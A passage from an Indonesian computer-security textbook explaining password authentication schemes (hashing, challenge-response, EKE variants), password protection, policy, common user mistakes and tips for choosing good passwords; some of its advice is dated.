password menjadi hash daripada hash menjadi password. Otentikasi
terdiri dari menjalankan fungsi hash ketika password diketik dan
membandingkannya dengan password yang telah disimpan. Sistem
seperti ini masih digunakan sampai sekarang pada sistem utama UNIX.
• Challange-Response
Untuk menghindari kemunculan password secara langsung pada jaringan
yang tidak terpercaya, dibuatlah sistem challangeresponse. Serve r akan
mengirim beberapa challange, yang mencirikan beberapa string pendek
secara acak. Sayangnya, sistem challange-response sudah tidak mampu
lagi mengimbangi aplikasi jaringan modern.

2) Otentikasi Kuat (Strong Authentication)


Walaupun enkripsi yang baik sudah ada sejak beberapa dekade yang lalu,
pengembangan dari otentikasi protokol langsung yang kuat baru dimulai
tahun 1990 dengan publikasi dari “EKE family of algorithms”.
• EKE
Merupakan keluarga protokol yang terdiri dari simetrik dan publickey
cryptosystems untuk melakukan otentikasi password. Untuk pertama
kalinya, protokol dapat menghindari dictionary attacks dan memung-
kinkan pemberitahuan secara rahasia tanpa melibatkan pihak ketiga atau
key-management.
• DH-EKE, SPEKE
EKE yang paling terkenal dan aman, sama dengan protokol pengganti
kunci Diffie-Hellman. Sebagai contoh: DH-EKE, adalah EKE yang di-
implementasikan menggunakan Diffie-Hellman. Perbedaan yang paling
Keamanan Komputer 125
signifikan yaitu pada pertukaran pesan pada DH yang sekarang dienkripsi
dengan shared password. Demikian juga dengan SPEKE, yang juga
berbasis Diffie-Hellman. Tetapi password sekarang digunakan untuk
mempengaruhi pemilihan dari parameter generator di dalam fungsi
session-key generation.
• A-EKE
Merupakan modifikasi dari EKE, biasa disebut Augmented-EKE; di-
mana server dapat menyimpan beberapa yang tidak plaintextequivalent
ke password pengguna. Protokol ini adalah satu -satunya protokol yang
sampai saat ini tahan terhadap dictionary attacks dan tidak mempunyai
database password yang plaintext-equivalent. Sayangnya, A-EKE
mengorbankan kerahasiaan dalam usahanya untuk menghindari plaintext-
equivalence.

3) Gangguan Otentikasi (Inconvenient Authentication)


Ketidakhadiran otentikasi yang kuat, teknologi otentikasi password yang
mudah, membuat para pendesain sistem tahun 1980an mencoba teknik
lain untuk menjamin keamanan password. Kebanyakan dari sistem yang
ada, tidak sepenuhnya password-based dan sering membutuhkan sesuatu
yang lebih pada bagian pengguna, administrator, atau keduanya untuk
meng-operasikan secara halus. Ada tiga metode yang dapat dilakukan,
yaitu one-time passwords, Kerberos, dan SSH.

13.3. Proteksi Password

Upaya untuk mengamankan proteksi password tersebut antara lain:


a) Salting
String password yang diberikan pemakai ditambah suatu string pendek
sehingga mencapai panjang password tertentu.
b) One-time Passwords
Password yang dimiliki oleh pemakai diganti secara teratur, dimana
seorang pemakai memiliki daftar password sendiri sehingga untuk login
ia selalu menggunakan password berikutnya. Dengan cara ini pemakai
akan menjadi lebih direpotkan karena harus menjaga daftar password
tersebut tidak sampai tercuri atau hilang.
c) Satu pertanyaan dan jawaban yang panjang
Yang mengharuskan pemakai memberikan satu pertanyaan yang panjang
beserta jawabannya, yang mana pertanyaan dan jawabannya dapat dipilih
oleh pemakai, yang mudah untuk diingat sehingga ia tidak perlu
menuliskannya pada kertas.
126 Keamanan Komputer
d) Tanggapan-tanggapan
Pemakai diberikan kebebasan untuk menggunakan satu atau beberapa
algoritma sekaligus.

13.4. Password Policy / Kebijakan Pengamanan

Kebijakan pengamanan atau yang biasa dikenal dengan password


policy adalah sekelompok peraturan yang dibuat untuk meningkatkan
keamanan informasi dengan mendorong pengguna untuk memakai
password yang kuat dan menggunakannya dengan tepat. Kebijakan
pengamanan sering menjadi bagian dari regulasi resmi suatu organisasi.
Kebijakan pengamanan dapat dilaporkan atau ditugaskan dengan
melakukan berbagai jenis pengujian ke dalam operating system.
Kebijaksanaan pengamanan biasanya sederhana dan umum digunakan,
dimana setiap pengguna dalam sistem dapat mengerti dan mengikutinya.
Isinya berupa tingkatan keamanan yang dapat melindungi data -data
penting yang disimpan oleh setiap user.
Beberapa hal yang dipertimbangkan dalam kebijaksanaan pengamanan
adalah siapa sajakah yang memiliki akses ke sistem, siapa sajakah yang
diizinkan untuk menginstall program ke dalam sistem, siapa memiliki
data apa, perbaikan terhadap kerusakan yang mungkin terja di, dan
penggunaan yang wajar dari sistem.

13.5. Kesalahan Utama Para Pengguna Password

Ada lima kesalahan yang biasanya dilakukan orang sehingga


mengakibatkan data mereka dapat dicuri orang lain, login dapat di-hack,
dan sebagainya. Umumya orang mengunci pintu rumahnya terlebih
dahulu sebelum pergi meninggalkan rumah. Namun dalam penggunaan
komputer, orang cenderung bertindak ceroboh. Tidak hanya pengguna
saja, tetapi termasuk juga administratornya.

Dari kelima kesalahan tersebut, hanya empat yang berkaitan erat dengan
penggunaan password. Berikut ini adalah empat kesalahan utama yang
berhubungan dengan pengamanan password:

1) Menuliskan password di kertas.


Pengguna biasanya menuliskan password di secarik kertas dan kemudian
menempelkannya di PC atau di samping monitor. Mereka terlalu malas
mengingat password itu sehingga mencatatnya di kertas dan
Keamanan Komputer 127
meletakkannya begitu saja sehingga semua orang dapat membacanya.
Hal ini didasarkan atas penelitian yang dilakukan oleh lembaga security
di US yang menyatakan sekitar 15-20% penggunan disuatu perusahaan
melakukan hal ini.

2) Pemilihan password yang buruk.


Di dalam memilih password, orang cenderung menggunakan nama orang
dekat, seperti nama suami atau istri, nama pacar, nama orang-tua, nama
binatang kesayangan, atau tulisan disekitar mereka yang gampang
ditebak oleh orang lain. Atau bahkan menggunakan tanggal lahir mereka
sendiri. Password yang buruk akan dengan gampang dicrack, apalagi
kalau password itu sama dengan username. Jika anda menggunakan
password dengan kombinasi abjad, nomor, dan huruf besarkecil (case
sensitive), maka akan dibutuhkan waktu yang cukup lama untuk meng -
crack. Hal itu juga tergantung seberapa panjang password yang
digunakan. Saat ini beberapa situs tertentu menggunakan kalimat sebagai
password, misalnya situs “hushmail”.

3) Meninggalkan komputer yang masih hidup begitu saja.


Banyak orang meninggalkan komputer mereka tanpa proteksi apa -apa.
Dengan demikian orang lain tinggal datang dan duduk untuk mengakses
data. Berbagai sistem operasi sudah memberikan fasilitas seperti screen
saver yang bisa diaktifkan passwordnya setelah lima menit (tergantung
setting dari pengguna) atau bisa di-lock begitu kita mau meninggalkan
komputer kita.

4) Tidak adanya kebijakan keamanan komputer di perusahaan.


Bukan hal yang aneh jika banyak perusahaan di Indonesia tidak
memilikinya karena mereka masih belum peduli dengan keamanan,
terkecuali untuk perusahaan multinasional. Hal itupun karena adanya
keharusan dari headquarter yang mengharuskan mereka menerapk an
kebijakan itu di perusahaan mereka yang berada di Indonesia. Security
policy ini mengatur segala hal yang berkaitan dengan keamanan
komputer, seperti penerapan password untuk setiap orang (misalnya:
panjang password minimal 9 karakter dengan kombinasi n umerik dan
karakter), yang juga disertai dengan sanksi yang akan diberikan jika
mereka melanggarnya.

128 Keamanan Komputer


13.6. Penggunaan Password yang Baik

Ada beberapa cara untuk menjaga keamanan komputer, terutama


dalam hal pemakaian password. Password merupakan hal v ital dalam
proses otentikasi.
Penggunaan password yang baik dan efektif seharusnya:
1) Minimal mempunyai panjang 6-8 karakter, yang dikombinasikan
dengan karakter angka, simbol atau menggunakan sensitive case.
2) Tidak memiliki maksud atau makna. Password yang memiliki makna
relatif mudah untuk ditebak. Jadi penggunaan nama anggota keluarga,
alamat, tanggal lahir, dan sejenisnya harus dihindari.
3) Tidak terdiri dari urutan abjad atau angka, misalnya ‘67890’ atau
‘hijklmn’.
4) Sebaiknya diberi periode berlaku. Ini berarti harus sering mengganti
password.
5) Jangan gunakan nama login (username) sebagai password dalam
bentuk apapun, baik dengan mengganti huruf kapital, dibalik, diulang,
dan sebagainya.
6) Jangan menggunakan kata-kata yang umum dan terdapat dalam
kamus.
7) Jangan pernah menuliskan password yang Anda pakai di tempat-
tempat yang dapat diakses umum.
8) Jangan membuat password yang membuat Anda kesulitan untuk
menghafalnya. Buatlah password yang mudah diingat, namun sulit untuk
ditebak.
9) Jangan pernah memberitahu password Anda kepada orang lain.
10) Apabila diperlukan, ada baiknya jika menggunakan software atau
utilitas tambahan untuk menambah keamanan komputer Anda.

Keamanan Komputer 129

Anda mungkin juga menyukai